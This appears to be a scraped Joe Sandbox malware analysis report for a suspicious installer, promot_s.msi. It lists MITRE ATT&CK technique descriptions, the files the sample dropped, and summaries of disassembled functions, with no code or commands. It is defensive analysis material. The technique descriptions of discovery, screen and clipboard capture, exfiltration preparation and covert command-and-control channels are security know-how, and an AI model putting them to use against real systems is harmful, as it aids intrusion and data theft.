Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report promot_s.msi

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Created / dropped Files

C:\Config.Msi\3b2df8.rbs

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\Local\HighMotionLog\{85D50C94-EF68-44C5-88E8-10362A632234}.txt

C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ApiCore.dll

C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\DirectXTex.dll

C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe

C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\Options\commands.cfg

C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\WinIMergeLib.dll

C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\cddbU.dll

C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\hams\database.wav

C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\jpeg62.dll

C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\pspiHost.dll

C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\wPDFView03.dll

C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\wp_type1ttf.dll

C:\Users\user\AppData\Local\Temp\7D3EA542ED1748BE9F8E7E2E62557D69.tmp

C:\Users\user\AppData\Local\Temp\988100C6E8D545D09E9088035937627A.tmp

C:\Users\user\AppData\Local\Temp\A3E96AA6001E40C6B03CF73333ED5DC6.tmp

C:\Users\user\AppData\Local\Temp\C4E6D975E5A1402FA70494B2534ED4B6.tmp

C:\Users\user\AppData\Local\Temp\F98E845BE4684F359B0039787E012B1D.tmp

C:\Users\user\AppData\Local\Temp\FC140C4738794FD38CB5E2739A3BFF17.tmp

C:\Users\user\AppData\Local\Temp\ICACHE-7E79BEA3.tmp

C:\Users\user\AppData\Local\Temp\ILIST-188D74ED.tmp

C:\Windows\Installer\3b2df6.msi

C:\Windows\Installer\MSI3086.tmp

C:\Windows\Installer\MSI3133.tmp

Windows Analysis Report
promot_s.msi

Function 1080A4B4 Relevance: 3.0, APIs: 2, Instructions: 35
COMMON

Function 1080A3CC Relevance: 3.0, APIs: 2, Instructions: 21
fileCOMMON

Function 109E8C5C Relevance: 1.6, APIs: 1, Instructions: 356
COMMON

Function 1080A060 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 156
registrystringCOMMON

Function 1089EC90 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 126
registryCOMMON

Function 108063C4 Relevance: 6.1, APIs: 4, Instructions: 145
threadCOMMON

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	API monitoring, File monitoring, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre